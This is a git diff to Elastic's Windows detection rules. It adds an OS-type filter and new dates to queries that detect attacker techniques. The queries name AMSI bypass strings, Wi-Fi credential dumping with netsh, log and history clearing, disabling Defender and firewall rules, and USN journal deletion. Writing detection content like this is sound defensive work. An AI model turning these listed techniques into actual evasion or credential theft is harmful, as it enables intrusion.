[rule] author = ["Elastic"] @@ -35,7 +35,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code:"4688" and +process where host.os.type == "windows" and event.code:"4688" and process.executable : "?:\\Windows\\System32\\lsass.exe" and process.parent.executable : "?:\\Windows\\System32\\lsass.exe" ''' diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml index bb8974cbe..bb59fca1a 100644 --- a/rules/windows/credential_access_wireless_creds_dumping.toml +++ b/rules/windows/credential_access_wireless_creds_dumping.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "netsh.exe" or process.pe.original_file_name == "netsh.exe") and process.args : "wlan" and process.args : "key*clear" ''' diff --git a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml index 626a5f9c4..c1c4c2416 100644 --- a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml +++ b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "attrib.exe" and process.args : "+h" ''' diff --git a/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml b/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml index ae8995454..a99d2c3a9 100644 --- a/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml +++ b/rules/windows/defense_evasion_amsi_bypass_dllhijack.toml @@ -4,7 +4,7 @@ integration = ["windows", "endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -74,7 +74,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.action != "deletion" and file.path != null and +file where host.os.type == "windows" and event.action != "deletion" and file.path != null and file.name : ("amsi.dll", "amsi") and not file.path : ("?:\\Windows\\system32\\amsi.dll", "?:\\Windows\\Syswow64\\amsi.dll") ''' diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index 897a4aed7..ab373dbfb 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -77,9 +77,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.category :"process" and - ( - powershell.file.script_block_text : +event.category:"process" and host.os.type:windows and + (powershell.file.script_block_text : ("System.Management.Automation.AmsiUtils" or amsiInitFailed or Invoke-AmsiBypass or @@ -94,11 +93,9 @@ event.category :"process" and unloadsilent or AmsiX64 or AmsiX32 or - FindAmsiFun) or - - powershell.file.script_block_text : ("[System.Runtime.InteropServices.Marshal]::Copy" and "VirtualProtect") or - - powershell.file.script_block_text : ("[Ref].Assembly.GetType(('System.Management.Automation" and ".SetValue(") + FindAmsiFun) or + powershell.file.script_block_text:("[System.Runtime.InteropServices.Marshal]::Copy" and "VirtualProtect") or + powershell.file.script_block_text:("[Ref].Assembly.GetType(('System.Management.Automation" and ".SetValue(") ) ''' diff --git a/rules/windows/defense_evasion_amsienable_key_mod.toml b/rules/windows/defense_evasion_amsienable_key_mod.toml index 9015a6ed7..4bf0a554a 100644 --- a/rules/windows/defense_evasion_amsienable_key_mod.toml +++ b/rules/windows/defense_evasion_amsienable_key_mod.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -91,7 +91,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : ( "HKEY_USERS\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", "HKU\\*\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable", diff --git a/rules/windows/defense_evasion_clearing_windows_console_history.toml b/rules/windows/defense_evasion_clearing_windows_console_history.toml index 4290604e6..0300edd00 100644 --- a/rules/windows/defense_evasion_clearing_windows_console_history.toml +++ b/rules/windows/defense_evasion_clearing_windows_console_history.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Austin Songer"] @@ -73,7 +73,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name == "PowerShell.EXE") and (process.args : "*Clear-History*" or (process.args : ("*Remove-Item*", "rm") and process.args : ("*ConsoleHost_history.txt*", "*(Get-PSReadlineOption).HistorySavePath*")) or diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index 875d019ce..19d04ac25 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -69,7 +69,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( ( (process.name : "wevtutil.exe" or process.pe.original_file_name == "wevtutil.exe") and diff --git a/rules/windows/defense_evasion_clearing_windows_security_logs.toml b/rules/windows/defense_evasion_clearing_windows_security_logs.toml index dfe45a89a..e3f94aef3 100644 --- a/rules/windows/defense_evasion_clearing_windows_security_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_security_logs.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Anabella Cristaldi"] @@ -56,7 +56,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:("audit-log-cleared" or "Log clear") +event.action:("audit-log-cleared" or "Log clear") and host.os.type:windows ''' diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml b/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml index 4903fe904..a5e50c522 100644 --- a/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml +++ b/rules/windows/defense_evasion_code_signing_policy_modification_builtin_tools.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/31" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( /* Windows */ ((process.name: "bcdedit.exe" or process.pe.original_file_name == "bcdedit.exe") and process.args: ("-set", "/set") and diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml index 2729bfaa5..66c9e9a26 100644 --- a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml +++ b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/31" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -33,7 +33,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type : ("creation", "change") and +registry where host.os.type == "windows" and event.type : ("creation", "change") and ( registry.path : "HKEY_USERS\\*\\Software\\Policies\\Microsoft\\Windows NT\\Driver Signing\\BehaviorOnFailedVerify" and registry.value: "BehaviorOnFailedVerify" and diff --git a/rules/windows/defense_evasion_create_mod_root_certificate.toml b/rules/windows/defense_evasion_create_mod_root_certificate.toml index 960087db0..065132233 100644 --- a/rules/windows/defense_evasion_create_mod_root_certificate.toml +++ b/rules/windows/defense_evasion_create_mod_root_certificate.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -88,7 +88,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : ( "HKLM\\Software\\Microsoft\\SystemCertificates\\Root\\Certificates\\*\\Blob", diff --git a/rules/windows/defense_evasion_cve_2020_0601.toml b/rules/windows/defense_evasion_cve_2020_0601.toml index 700bdc0b9..535d040ee 100644 --- a/rules/windows/defense_evasion_cve_2020_0601.toml +++ b/rules/windows/defense_evasion_cve_2020_0601.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.provider:"Microsoft-Windows-Audit-CVE" and message:"[CVE-2020-0601]" +event.provider:"Microsoft-Windows-Audit-CVE" and message:"[CVE-2020-0601]" and host.os.type:windows ''' diff --git a/rules/windows/defense_evasion_defender_disabled_via_registry.toml b/rules/windows/defense_evasion_defender_disabled_via_registry.toml index 7c944f798..e570adcf4 100644 --- a/rules/windows/defense_evasion_defender_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_defender_disabled_via_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -75,7 +75,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and ( ( registry.path: ( diff --git a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml index 6cd9da634..c99c44d91 100644 --- a/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml +++ b/rules/windows/defense_evasion_defender_exclusion_via_powershell.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -87,7 +87,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")) and process.args : ("*Add-MpPreference*", "*Set-MpPreference*") and process.args : ("*-Exclusion*") diff --git a/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml b/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml index 197b6a2f5..9a2ca3927 100644 --- a/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml +++ b/rules/windows/defense_evasion_delete_volume_usn_journal_with_fsutil.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "fsutil.exe" or process.pe.original_file_name == "fsutil.exe") and process.args : "deletejournal" and process.args : "usn" ''' diff --git a/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml b/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml index 4f1ce8562..ec8cc3905 100644 --- a/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml +++ b/rules/windows/defense_evasion_disable_posh_scriptblocklogging.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/06" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -76,7 +76,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type == "change" and +registry where host.os.type == "windows" and event.type == "change" and registry.path : ( "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging", "\\REGISTRY\\MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging" diff --git a/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml b/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml index 4e0678b51..6154dd858 100644 --- a/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml +++ b/rules/windows/defense_evasion_disable_windows_firewall_rules_with_netsh.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "netsh.exe" and ( (process.args : "disable" and process.args : "firewall" and process.args : "set") or diff --git a/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml b/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml index a15bb59f2..50fa47a27 100644 --- a/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml +++ b/rules/windows/defense_evasion_disabling_windows_defender_powershell.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -75,7 +75,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") or process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")) and process.args : "Set-MpPreference" and process.args : ("-Disable*", "Disabled", "NeverSend", "-Exclusion*") ''' diff --git a/rules/windows/defense_evasion_disabling_windows_logs.toml b/rules/windows/defense_evasion_disabling_windows_logs.toml index 475862b77..26cc55c2c 100644 --- a/rules/windows/defense_evasion_disabling_windows_logs.toml +++ b/rules/windows/defense_evasion_disabling_windows_logs.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Ivan Ninichuck", "Austin Songer"] @@ -72,7 +72,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( ((process.name:"logman.exe" or process.pe.original_file_name == "Logman.exe") and process.args : "EventLog-*" and process.args : ("stop", "delete")) or diff --git a/rules/windows/defense_evasion_dns_over_https_enabled.toml b/rules/windows/defense_evasion_dns_over_https_enabled.toml index bc51225ec..1459bc5d5 100644 --- a/rules/windows/defense_evasion_dns_over_https_enabled.toml +++ b/rules/windows/defense_evasion_dns_over_https_enabled.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Austin Songer"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and (registry.path : "*\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled" and registry.data.strings : "1") or (registry.path : "*\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode" and diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index 7bc221d65..07fcf22a1 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("csc.exe", "vbc.exe") and process.parent.name : ("wscript.exe", "mshta.exe", "cscript.exe", "wmic.exe", "svchost.exe", "rundll32.exe", "cmstp.exe", "regsvr32.exe") ''' diff --git a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml index e67c8f102..e7a8da1c4 100644 --- a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml +++ b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -73,7 +73,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "netsh.exe" or process.pe.original_file_name == "netsh.exe") and process.args : ("localport=3389", "RemoteDesktop", "group=\"remote desktop\"") and process.args : ("action=allow", "enable=Yes", "enable") diff --git a/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml b/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml index c2ad1d277..51036b633 100644 --- a/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml +++ b/rules/windows/defense_evasion_enable_network_discovery_with_netsh.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -69,7 +69,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "netsh.exe" and process.args : ("firewall", "advfirewall") and process.args : "group=Network Discovery" and process.args : "enable=Yes" ''' diff --git a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml index 376f8e772..7df65a5a2 100644 --- a/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +++ b/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.executable : ("?:\\Windows\\SysWOW64\\control.exe", "?:\\Windows\\System32\\control.exe") and process.command_line : ("*.jpg*", diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index f6008e58e..179f905c0 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml +++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.pe.original_file_name == "wuauclt.exe" or process.name : "wuauclt.exe") and /* necessary windows update client args to load a dll */ process.args : "/RunHandlerComServer" and process.args : "/UpdateDeploymentProvider" and diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml index d87548e67..88e55bcf2 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -94,7 +94,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "MSBuild.exe" and process.parent.name : ("eqnedt32.exe", "excel.exe", diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml index de1539996..1bbbb00f7 100755 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe") and process.parent.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "cscript.exe", "wscript.exe", "mshta.exe") ''' diff --git a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml index 4db7a9a2d..019238357 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_by_system_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "MSBuild.exe" and process.parent.name : ("explorer.exe", "wmiprvse.exe") ''' diff --git a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml index 8a1d7bad8..ee1cf4892 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -80,7 +80,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name == "MSBuild.exe" and not process.name : "MSBuild.exe" ''' diff --git a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml index 110228ee6..024bc3351 100644 --- a/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +++ b/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -36,7 +36,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "MSBuild.exe" and process.name : ("csc.exe", "iexplore.exe", "powershell.exe") ''' diff --git a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml index 6ffafbe65..bd8bf99ef 100644 --- a/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml +++ b/rules/windows/defense_evasion_execution_suspicious_explorer_winword.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and not (process.name : ("winword.exe", "explorer.exe", "w3wp.exe", "Dism.exe") or process.executable : ("?:\\Windows\\explorer.exe", diff --git a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml index 10cb8f36c..2caa87b0f 100644 --- a/rules/windows/defense_evasion_execution_windefend_unusual_path.toml +++ b/rules/windows/defense_evasion_execution_windefend_unusual_path.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/19" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Dennis Perto"] @@ -34,7 +34,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ( (process.pe.original_file_name == "MsMpEng.exe" and not process.name : "MsMpEng.exe") or (process.name : "MsMpEng.exe" and not diff --git a/rules/windows/defense_evasion_file_creation_mult_extension.toml b/rules/windows/defense_evasion_file_creation_mult_extension.toml index 1ad519aba..ded93fc8b 100644 --- a/rules/windows/defense_evasion_file_creation_mult_extension.toml +++ b/rules/windows/defense_evasion_file_creation_mult_extension.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and file.extension : "exe" and +file where host.os.type == "windows" and event.type == "creation" and file.extension : "exe" and file.name regex~ """.*\.(vbs|vbe|bat|js|cmd|wsh|ps1|pdf|docx?|xlsx?|pptx?|txt|rtf|gif|jpg|png|bmp|hta|txt|img|iso)\.exe""" and not (process.executable : ("?:\\Windows\\System32\\msiexec.exe", "C:\\Users\\*\\QGIS_SCCM\\Files\\QGIS-OSGeo4W-*-Setup-x86_64.exe") and file.path : "?:\\Program Files\\QGIS *\\apps\\grass\\*.exe") and diff --git a/rules/windows/defense_evasion_from_unusual_directory.toml b/rules/windows/defense_evasion_from_unusual_directory.toml index b0f700a46..5c6f205e0 100644 --- a/rules/windows/defense_evasion_from_unusual_directory.toml +++ b/rules/windows/defense_evasion_from_unusual_directory.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and /* add suspicious execution paths here */ process.executable : ("C:\\PerfLogs\\*.exe","C:\\Users\\Public\\*.exe","C:\\Windows\\Tasks\\*.exe","C:\\Intel\\*.exe","C:\\AMD\\Temp\\*.exe","C:\\Windows\\AppReadiness\\*.exe", 